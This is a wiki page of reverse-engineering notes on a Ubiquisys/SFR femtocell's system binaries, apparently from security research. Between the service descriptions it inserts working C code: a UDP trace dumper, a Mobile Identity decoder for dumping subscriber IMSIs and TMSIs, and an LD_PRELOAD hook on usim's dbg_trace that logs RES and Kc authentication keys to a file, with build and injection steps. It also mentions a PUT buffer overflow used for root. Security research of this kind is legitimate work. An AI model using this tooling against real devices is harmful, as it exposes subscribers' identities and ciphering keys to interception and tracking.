This is a list of the binaries running on the device, together with a rudimentary description of their functionality as far as we can judge. We did not fully reverse them and only acquired the basic knowledge required to understand how the device works and to implement our attacks. These binaries come from Ubiquisys (the vendor), not from SFR (the operator).

binaries

apm

  • performance measurements

bqos

  • backhaul quality of service, submits bqos performance data via ftp

cci

  • (common control interface?) db interface service

dc

  • firmware check/download/recovery via web interface

local_trace

  • receives data on a trace socket and dumps it to /tmp/local_trace.bin (not working, for whatever reason)
  • listens on UDP port 10010 and receives the traces
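Since local_trace's own dump does not work, a replacement receiver is useful. The following is an added example written for this page, not Ubiquisys code: it binds UDP 10010, appends every datagram to a file with a 2-byte big-endian length prefix (so datagram boundaries survive, which a plain concatenation would lose) and ships a reader for that format plus a self-check over a constructed datagram. The only thing taken from the page is "plain UDP datagrams on port 10010"; the framing, the output path and the function names are our choices. Stop local_trace before running it, otherwise bind() fails with EADDRINUSE; keep in mind that zapinit restarts crashed services, so the original may come back.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define TRACE_PORT 10010        /* port local_trace listens on (from the page) */
#define MAX_DGRAM  65535        /* largest UDP payload; also fits the u16 length prefix */

/* Bind a UDP socket on 0.0.0.0:port. Returns the fd or -1. */
int open_trace_socket(uint16_t port)
{
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) return -1;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(s, (struct sockaddr *)&sa, sizeof sa) < 0) { close(s); return -1; }
    return s;
}

/* Receive up to max_records datagrams (max_records < 0: forever) and append
 * each one to out as [u16 big-endian length][payload]. Returns the number of
 * records written, or -1 on a socket/file error. */
int recv_trace_records(int sock, FILE *out, int max_records)
{
    static uint8_t buf[MAX_DGRAM];
    int count = 0;
    while (max_records < 0 || count < max_records) {
        ssize_t n = recv(sock, buf, sizeof buf, 0);
        if (n < 0) return -1;
        uint8_t hdr[2] = { (uint8_t)(n >> 8), (uint8_t)n };
        if (fwrite(hdr, 1, 2, out) != 2 || fwrite(buf, 1, (size_t)n, out) != (size_t)n)
            return -1;
        fflush(out);            /* keep the dump usable even if we get killed */
        count++;
    }
    return count;
}

/* Read one framed record back into buf. Returns the payload length, or -1 at
 * end of file, on a truncated record, or if buf is too small. */
int read_trace_record(FILE *in, uint8_t *buf, size_t bufsz)
{
    uint8_t hdr[2];
    if (fread(hdr, 1, 2, in) != 2) return -1;
    size_t n = (size_t)hdr[0] << 8 | hdr[1];
    if (n > bufsz || fread(buf, 1, n, in) != n) return -1;
    return (int)n;
}

/* Self-check with a constructed datagram (not captured from the device) sent
 * over an AF_UNIX datagram socketpair, so no network is needed. Returns 1 if
 * the record round-trips through the file format, 0 otherwise. */
int trace_selftest(void)
{
    static const uint8_t sample[] = "constructed trace datagram 0001";
    const size_t n = sizeof sample - 1;
    int sv[2], ok = 0;
    uint8_t back[64];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) < 0) return 0;
    FILE *f = tmpfile();
    if (f && send(sv[0], sample, n, 0) == (ssize_t)n &&
        recv_trace_records(sv[1], f, 1) == 1) {
        rewind(f);
        ok = read_trace_record(f, back, sizeof back) == (int)n &&
             memcmp(back, sample, n) == 0 &&
             read_trace_record(f, back, sizeof back) == -1;   /* clean EOF */
    }
    if (f) fclose(f);
    close(sv[0]);
    close(sv[1]);
    return ok;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/tmp/local_trace.bin";
    int s = open_trace_socket(TRACE_PORT);
    if (s < 0) { perror("bind 10010 (is local_trace still running?)"); return 1; }
    FILE *out = fopen(path, "ab");
    if (!out) { perror(path); return 1; }
    return recv_trace_records(s, out, -1) < 0 ? 1 : 0;
}
```

Cross-compile it for the device and run it in place of local_trace; the dump can then be split back into individual datagrams with read_trace_record on the host.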

libosal.so

  • central shared library used by almost all system services
  • provides message queue functionality for IPC
  • provides functions for configuration parsing
  • provides debug functionality
  • uses the libiniparser API
  • note: iniparser is also used by kamailio
  • used to parse e.g. operator.ini

gan

  • GAN client
  • some interesting functions to hook:
    • gac_cnv_sc_imsi_gac_imsi
    • gan also receives location updating request information, might be interesting to hook as well ⇒ ganif_gac__dl_payload_xfr_hdlr maybe
  • dump TMSIs
  • ganif_sc_message_handler is _the_ huge message handling function, a 105-case switch
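Whatever gets hooked in gan, the subscriber identity in a Location Updating Request arrives as a 3GPP TS 24.008 Mobile Identity IE, so dumping IMSIs and TMSIs means decoding that encoding. The decoder below is an added example for this page, not code from the device or from Ubiquisys, and whether gac_cnv_sc_imsi_gac_imsi sees the IE in this raw form is an assumption to verify in the disassembly. The two sample IEs (an IMSI in the French SFR range and a TMSI) are constructed for the example, not captured.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Identity types from 3GPP TS 24.008, 10.5.1.4 (Mobile Identity IE). */
enum mi_type { MI_NONE = 0, MI_IMSI = 1, MI_IMEI = 2, MI_IMEISV = 3, MI_TMSI = 4 };

struct mobile_identity {
    enum mi_type type;
    char digits[17];    /* IMSI/IMEI/IMEISV digits as text (max 16), NUL-terminated */
    uint32_t tmsi;      /* only meaningful when type == MI_TMSI */
};

/* Decode the value part of a Mobile Identity IE (the bytes after the length
 * octet). Octet 1: bits 1-3 identity type, bit 4 odd/even digit count,
 * bits 5-8 the first digit. Each following octet carries two BCD digits, low
 * nibble first; with an even digit count the last high nibble is 0xF filler.
 * A TMSI has 0xF in the high nibble of octet 1 and 4 raw bytes after it.
 * Returns 0 on success, -1 on malformed input. */
int decode_mobile_identity(const uint8_t *ie, size_t len, struct mobile_identity *out)
{
    if (len < 1) return -1;
    memset(out, 0, sizeof *out);
    out->type = (enum mi_type)(ie[0] & 0x07);
    int odd = (ie[0] >> 3) & 1;

    if (out->type == MI_TMSI) {
        if (len != 5 || (ie[0] >> 4) != 0xF) return -1;
        out->tmsi = (uint32_t)ie[1] << 24 | (uint32_t)ie[2] << 16 |
                    (uint32_t)ie[3] << 8 | ie[4];
        return 0;
    }
    if (out->type != MI_IMSI && out->type != MI_IMEI && out->type != MI_IMEISV)
        return -1;

    /* digit count implied by the length and the odd/even flag; 16 is the max */
    size_t ndigits = 1 + 2 * (len - 1) - (odd ? 0 : 1);
    if (ndigits == 0 || ndigits > 16) return -1;

    size_t n = 0;
    uint8_t d = ie[0] >> 4;
    if (d > 9) return -1;
    out->digits[n++] = (char)('0' + d);
    for (size_t i = 1; i < len; i++) {
        uint8_t lo = ie[i] & 0x0F, hi = ie[i] >> 4;
        if (lo > 9) return -1;
        out->digits[n++] = (char)('0' + lo);
        if (i == len - 1 && !odd) {       /* filler nibble on even digit count */
            if (hi != 0xF) return -1;
            break;
        }
        if (hi > 9) return -1;
        out->digits[n++] = (char)('0' + hi);
    }
    out->digits[n] = '\0';
    return 0;
}

/* Constructed samples: IMSI 208101234567890 (15 digits, odd) and TMSI 0x12345678. */
static const uint8_t sample_imsi_ie[] = { 0x29, 0x80, 0x01, 0x21, 0x43, 0x65, 0x87, 0x09 };
static const uint8_t sample_tmsi_ie[] = { 0xF4, 0x12, 0x34, 0x56, 0x78 };

/* Returns 1 when both constructed samples decode to the expected identities. */
int mobile_identity_selftest(void)
{
    struct mobile_identity mi;
    if (decode_mobile_identity(sample_imsi_ie, sizeof sample_imsi_ie, &mi) != 0 ||
        mi.type != MI_IMSI || strcmp(mi.digits, "208101234567890") != 0)
        return 0;
    if (decode_mobile_identity(sample_tmsi_ie, sizeof sample_tmsi_ie, &mi) != 0 ||
        mi.type != MI_TMSI || mi.tmsi != 0x12345678u)
        return 0;
    return 1;
}

int main(void)
{
    struct mobile_identity mi;
    if (decode_mobile_identity(sample_imsi_ie, sizeof sample_imsi_ie, &mi) == 0)
        printf("IMSI %s\n", mi.digits);
    if (decode_mobile_identity(sample_tmsi_ie, sizeof sample_tmsi_ie, &mi) == 0)
        printf("TMSI %08x\n", mi.tmsi);
    return mobile_identity_selftest() ? 0 : 1;
}
```

The length and filler checks matter in a hook: the function runs on whatever bytes a handset sends, so a malformed IE must be rejected rather than written past the digits buffer.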

scapp

  • service control application
  • uses an sqlite database
  • also initiates factory recovery?!

usim

  • SIM controller program, talks to the SIM via a serial port
  • interesting note: can somehow interact with Google Maps (nlpp)
  • we can get RES and Kc from this application by hooking dbg_trace here, called from run_3g_authentication
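One way to do that hook, as an added example for this page (not Ubiquisys code and not the exact hook we used): an LD_PRELOAD library that interposes dbg_trace, formats the message, logs every line mentioning RES or Kc to a file of our choosing, and forwards the text to the real function so usim keeps tracing. Assumptions, marked in the code: dbg_trace takes a printf-style format (check the call sites in run_3g_authentication), and the trace text uses a "key=value" layout for the extractor (the raw line is logged regardless, so nothing is lost if it does not); AUTH_LOG and the helper names are ours.

```c
#define _GNU_SOURCE
#include <ctype.h>
#include <dlfcn.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#ifndef RTLD_NEXT                    /* glibc value, in case _GNU_SOURCE came too late */
#define RTLD_NEXT ((void *)-1L)
#endif

#define AUTH_LOG "/tmp/auth_material.log"   /* our own output file (chosen here) */

/* ASSUMPTION: dbg_trace takes a printf-style format string and varargs.
 * Verify against the call sites in run_3g_authentication before relying on it. */
typedef void (*dbg_trace_fn)(const char *fmt, ...);

/* Nonzero when a formatted trace line mentions RES or Kc at all. Deliberately
 * loose, because the exact wording of the trace text is not known. */
int auth_material_in_line(const char *line)
{
    return strstr(line, "RES") != NULL || strstr(line, "Kc") != NULL;
}

/* Copy the value after "<key>=" into out (up to the next space, comma,
 * semicolon or end of line). Returns the value length, or -1 when the key is
 * absent as a whole token or out is too small. ASSUMPTION: "key=value" layout. */
int extract_field(const char *line, const char *key, char *out, size_t outsz)
{
    size_t klen = strlen(key);
    const char *p = line;
    while ((p = strstr(p, key)) != NULL) {
        int at_token_start = (p == line) || !isalnum((unsigned char)p[-1]);
        if (at_token_start && p[klen] == '=') {
            const char *v = p + klen + 1;
            size_t n = strcspn(v, " ,;\r\n");
            if (n + 1 > outsz) return -1;
            memcpy(out, v, n);
            out[n] = '\0';
            return (int)n;
        }
        p += klen;                   /* skip this occurrence, e.g. "XRES=" */
    }
    return -1;
}

static void record_line(const char *line)
{
    char val[128];
    FILE *f = fopen(AUTH_LOG, "a");
    if (!f) return;
    if (extract_field(line, "RES", val, sizeof val) > 0) fprintf(f, "RES=%s\n", val);
    if (extract_field(line, "Kc", val, sizeof val) > 0)  fprintf(f, "Kc=%s\n", val);
    fprintf(f, "raw: %s\n", line);   /* always keep the raw line */
    fclose(f);
}

/* Interposed dbg_trace: format, keep what we want, then forward to the real
 * function. A va_list cannot be re-passed through a variadic function pointer,
 * so the already formatted text goes through a "%s" format instead. */
void dbg_trace(const char *fmt, ...)
{
    char line[1024];
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(line, sizeof line, fmt, ap);
    va_end(ap);

    if (auth_material_in_line(line))
        record_line(line);

    dbg_trace_fn real = (dbg_trace_fn)dlsym(RTLD_NEXT, "dbg_trace");
    if (real)
        real("%s", line);
}
```

Build it with the device's cross compiler (`gcc -shared -fPIC -o hook.so hook.c -ldl`) and start usim with `LD_PRELOAD=/tmp/hook.so`. Two checks before expecting output: interposition only works if dbg_trace is resolved through the dynamic linker (for instance exported by libosal.so, which provides the debug functionality), so `nm -D usim | grep dbg_trace` should show it as an undefined (`U`) symbol; a local copy inside usim cannot be hooked this way. And since zapinit starts and restarts usim, the environment variable has to reach zapinit's child, or usim has to be started by hand.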

tr069

  • TR-069 remote provisioning service
  • used by the operator to push configuration updates to the device
  • based on SOAP and XML
  • carries a "copyright 1985, 1989 Regents of the University of California" string. can we acquire the source somehow?

srv

sipc

  • complete SIP client
  • sets the numbers for fire, marine, mountain emergency, ambulance, police…
  • note: what is 192.168.50.169, as seen in the authentication code?
  • also looks responsible for RTP

wsal

  • mini httpd with hardcoded CGI scripts, see html
  • based on shttpd
  • contains a stack-based buffer overflow in PUT processing, see root exploit

cci

  • SOAP client?!

netc

  • responsible for network configuration:
    • interfaces
    • routes
    • iptables rules
    • ntp

zapinit

  • Zone Access Point init
  • central managing service for all other system binaries
  • starts the initial services and restarts crashed ones

/dev/pico_sram

the dc, usim, rs and zapinit binaries map this device and store various information in it. valuable data might be in there, we should look into this

binaries.txt · Last modified: 2011/08/30 15:34 (external edit)
Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Share Alike 3.0 Unported